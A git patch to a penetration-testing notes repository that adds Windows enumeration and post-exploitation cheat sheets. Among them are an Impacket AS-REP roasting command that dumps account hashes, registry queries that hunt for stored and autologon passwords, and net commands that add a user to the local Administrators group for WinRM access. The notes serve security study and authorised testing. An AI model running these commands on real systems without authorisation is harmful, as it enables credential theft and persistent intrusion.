From 9be912401b05c673a52d965f41d85404f87c1041 Mon Sep 17 00:00:00 2001 From: gurkenhabicht Date: Wed, 21 May 2025 17:27:29 +0200 Subject: [PATCH] added windows enumeration details. --- Enumeration/AS-REP Roasting.md | 12 ++++++ Enumeration/Windows/Powershell.md | 27 +++++++++----- Enumeration/Windows/Registry.md | 9 +++++ Post Exploitation/Windows/Add Users.md | 51 ++++++++++++++++++++++++-- Post Exploitation/Windows/Registry.md | 12 +++++- 5 files changed, 98 insertions(+), 13 deletions(-) create mode 100644 Enumeration/AS-REP Roasting.md create mode 100644 Enumeration/Windows/Registry.md diff --git a/Enumeration/AS-REP Roasting.md b/Enumeration/AS-REP Roasting.md new file mode 100644 index 0000000..eb5b8e2 --- /dev/null +++ b/Enumeration/AS-REP Roasting.md @@ -0,0 +1,12 @@ +# AS-Rep Roating + +AS-Rep Roasting dumps user accounts which did not enable pre-authentication. +This is somewhat similar to Kerberoasting but includes user accounts as well. + +## Usage + +Impacket got `GetNPUsers` to check non pre-authenticated user accounts and find credentials. + +```sh +impacket-GetNPUsers $TARGET_DOMAIN/ -dc-ip $TARGET_DC_IP -usersfile $USERS_FILE -format hashcat -outputfile hashes.txt -no-pass +``` diff --git a/Enumeration/Windows/Powershell.md b/Enumeration/Windows/Powershell.md index 77b6e4b..1cf783e 100644 --- a/Enumeration/Windows/Powershell.md +++ b/Enumeration/Windows/Powershell.md @@ -1,18 +1,23 @@ # Powershell Usage ## Get-Help + ``` -Get-Help Command-Name +Get-Help Command-Name ``` -* Show examples + +Show examples + ``` Get-Help Command-Name -Examples ``` -* Get-Command gets all the cmdlets installed on the current Computer. +Get-Command gets all the cmdlets installed on the current Computer. + ``` Get-Command ``` + ``` Get-Command Verb-* Get-Command Invoke-* @@ -20,19 +25,23 @@ Get-Command Get-* ``` ## Passing Output via Pipe -* A pipe passes object including methods and attributes. + + A pipe passes object including methods and attributes. ``` Verb-Noun | Get-Member ``` + ``` Get-Command | Get-Member -MemberType Method ``` ## Creating Objects from Previous Cmdlets + ``` Get-ChildItem | Select-Object -Property Mode, Name ``` + * first - gets the first x object * last - gets the last x object * unique - shows the unique objects @@ -74,7 +83,7 @@ Get-ChildItem | Sort-Object ## Finding a File ``` Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'} -``` +``` ```sh Get-HotFix | Format-list | findstr ``` @@ -111,7 +120,7 @@ Copy-Item ## Count Lines of Output As an example, count all cmdlets on the system ``` -Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object +Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object ``` ## Count Words @@ -129,7 +138,7 @@ Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt' Get-Location ``` -## File Metadata +## File Metadata ```sh ls | Format-List * ``` @@ -216,7 +225,7 @@ driverquery ### Processes * Start processes -```sh +```sh Start-Process ``` @@ -265,7 +274,7 @@ Get-ACL C:\ ### Port Scanner ``` for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i} -``` +``` ### Ping Hosts ```sh diff --git a/Enumeration/Windows/Registry.md b/Enumeration/Windows/Registry.md new file mode 100644 index 0000000..2829ef1 --- /dev/null +++ b/Enumeration/Windows/Registry.md @@ -0,0 +1,9 @@ +# Registry Enumeration + +## Usage + +Query keys including the string `password` via `reg`. + +```sh +reg query HKLM /f "password" /t REG_SZ /s +``` diff --git a/Post Exploitation/Windows/Add Users.md b/Post Exploitation/Windows/Add Users.md index 797deba..3633538 100644 --- a/Post Exploitation/Windows/Add Users.md +++ b/Post Exploitation/Windows/Add Users.md @@ -1,16 +1,61 @@ -# Add user as system user +# Users + +## List Users + +List local users + +``` +net user +``` + +List users of the domain + +``` +net user /domain +``` + +Get more information about a user + +``` +net user Administrator /domain +``` + +## List Groups + +List local groups + +``` +net localgroup +``` + +List groups of the domain + +``` +net group /domain +``` + +Get more information about a group + +``` +net group Administrator /domain +``` + +## Add user as system user + ```sh net user /add ``` + ```sh net localgroup Administrator /add ``` + ```sh net localgroup "Remote Management Users" /add ``` + ```sh net user ``` -* connect via winRM - +connect via winRM afterwards using the new user diff --git a/Post Exploitation/Windows/Registry.md b/Post Exploitation/Windows/Registry.md index 72172f1..f7066ea 100644 --- a/Post Exploitation/Windows/Registry.md +++ b/Post Exploitation/Windows/Registry.md @@ -1,7 +1,17 @@ # Windows Registry ## AutoLogin Password -* Automatic logon password is save in plaintext + +Automatic logon password is save in plaintext + ``` reg query "HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon" ``` + +## Search for Passwords + +Use `reg` to search for passwords inside Keys of the registry via the following line. + +``` +reg query HKLM /f "password" /t REG_SZ /s +```